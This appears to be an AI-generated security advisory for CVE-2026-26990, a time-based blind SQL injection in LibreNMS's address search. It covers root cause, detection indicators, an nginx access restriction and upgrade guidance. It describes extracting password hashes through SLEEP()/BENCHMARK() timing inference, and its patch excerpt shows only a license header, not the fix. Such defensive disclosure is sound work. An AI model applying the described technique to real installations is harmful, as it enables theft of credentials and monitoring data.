CVE-2026-26990 Overview
LibreNMS, an auto-discovering PHP/MySQL/SNMP based network monitoring tool, contains a Time-Based Blind SQL Injection vulnerability in address-search.inc.php. Versions 25.12.0 and below are affected by this flaw, which allows authenticated attackers to manipulate SQL query logic and extract sensitive database information through time-based conditional responses. The vulnerability exists because a crafted subnet prefix value supplied via the address parameter is concatenated directly into an SQL query without proper parameter binding.
Critical Impact
Authenticated users can exploit this SQL injection vulnerability to infer and extract sensitive database information, potentially compromising the confidentiality, integrity, and availability of the entire LibreNMS monitoring infrastructure.
Affected Products
- LibreNMS versions 25.12.0 and below
- LibreNMS installations with address search functionality enabled
- All LibreNMS deployments prior to version 26.2.0
Discovery Timeline
- 2026-02-20 - CVE CVE-2026-26990 published to NVD
- 2026-02-20 - Last updated in NVD database
Technical Details for CVE-2026-26990
Vulnerability Analysis
This Time-Based Blind SQL Injection vulnerability (CWE-89) exists in the address search functionality of LibreNMS. The root issue stems from improper handling of user-supplied input in the address-search.inc.php file. When an authenticated user submits a search query with a specially crafted subnet prefix, the application fails to properly sanitize or parameterize this input before incorporating it into a database query.
The vulnerability is classified as authenticated, meaning an attacker must possess valid credentials to exploit it. However, any authenticated user—regardless of privilege level—can leverage this flaw to extract sensitive information from the backend MySQL database through time-based inference attacks.
Root Cause
The vulnerability originates from direct string concatenation of user-supplied input into SQL queries without proper parameter binding. The address parameter in the address search functionality accepts subnet prefix values that are then unsafely incorporated into database queries. This violates secure coding practices that mandate the use of prepared statements or parameterized queries for all user-controlled data.
Attack Vector
The attack is network-accessible and exploitable with low complexity. An authenticated attacker can submit malicious payloads through the address search feature, injecting SQL syntax that includes time-delay functions such as SLEEP() or BENCHMARK(). By measuring response times, the attacker can systematically infer database contents character by character, extracting usernames, password hashes, configuration data, and other sensitive information stored in the LibreNMS database.
// Security patch excerpt from AddressSearchController.php
// Source: https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1
+<?php
+
+/**
+ * SearchController.php
+ *
+ * -Description-
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <https://www.gnu.org/licenses/>.
+ *
+ * @link https://www.librenms.org
+ *
+ * @copyright 2026 Tony Murray
+ * @author Tony Murray <murraytony@gmail.com>
+ */
+
+namespace App\Http\Controllers\Table;
+
+use App\Models\Port;
+use Illuminate\Contracts\Database\Query\Expression;
The fix involves a complete rewrite of the address search backend to use Laravel's Eloquent ORM with proper parameter binding, eliminating the direct SQL string concatenation vulnerability.
Detection Methods for CVE-2026-26990
Indicators of Compromise
- Anomalous response times on address search API endpoints indicating time-based SQL injection attempts
- Database logs showing unusual query patterns with SLEEP(), BENCHMARK(), or WAITFOR functions
- Multiple sequential requests to address search functionality from a single authenticated session
- Web application logs containing SQL syntax characters in address search parameters (e.g., ', --, ;, OR, AND)
- Unexpected database load or timeout errors correlated with address search requests
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect SQL injection patterns in HTTP requests
- Monitor database query logs for queries containing time-delay functions or unusual conditional statements
- Configure alerting on abnormal response time distributions for the address search endpoint
- Deploy SentinelOne Singularity XDR to detect anomalous application behavior and potential SQL injection exploitation attempts
- Audit authentication logs for accounts performing excessive address search queries
Monitoring Recommendations
- Enable detailed logging for the LibreNMS address search functionality
- Configure real-time alerting for SQL injection signature matches in web server logs
- Monitor database performance metrics for unusual CPU spikes or query execution delays
- Implement user behavior analytics to identify authenticated users exhibiting suspicious search patterns
How to Mitigate CVE-2026-26990
Immediate Actions Required
- Upgrade LibreNMS to version 26.2.0 or later immediately
- Review authentication logs to identify potential exploitation attempts
- Audit user accounts with access to address search functionality for suspicious activity
- Apply network segmentation to limit access to LibreNMS management interfaces
- Consider temporarily disabling address search functionality if immediate patching is not possible
Patch Information
The vulnerability has been addressed in LibreNMS version 26.2.0. The fix involves a complete rewrite of the address search backend using Laravel's Eloquent ORM with proper parameter binding. The security patch is available via the GitHub Commit Fix. Additional details are available in the GitHub Security Advisory GHSA-79q9-wc6p-cf92 and the GitHub Pull Request #18777.
Workarounds
- Restrict network access to LibreNMS to trusted IP addresses only
- Implement additional authentication controls such as multi-factor authentication
- Deploy a Web Application Firewall with SQL injection detection rules
- Monitor and limit API rate access for authenticated users
# Configuration example - Restrict access to LibreNMS via nginx
# Add to your nginx server block configuration
location /ajax/table/address-search {
# Temporarily disable address search or restrict to admin IPs
allow 10.0.0.0/8;
deny all;
# Or implement rate limiting
limit_req zone=librenms_api burst=5 nodelay;
}
# Define rate limiting zone in http block
# limit_req_zone $binary_remote_addr zone=librenms_api:10m rate=10r/m;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
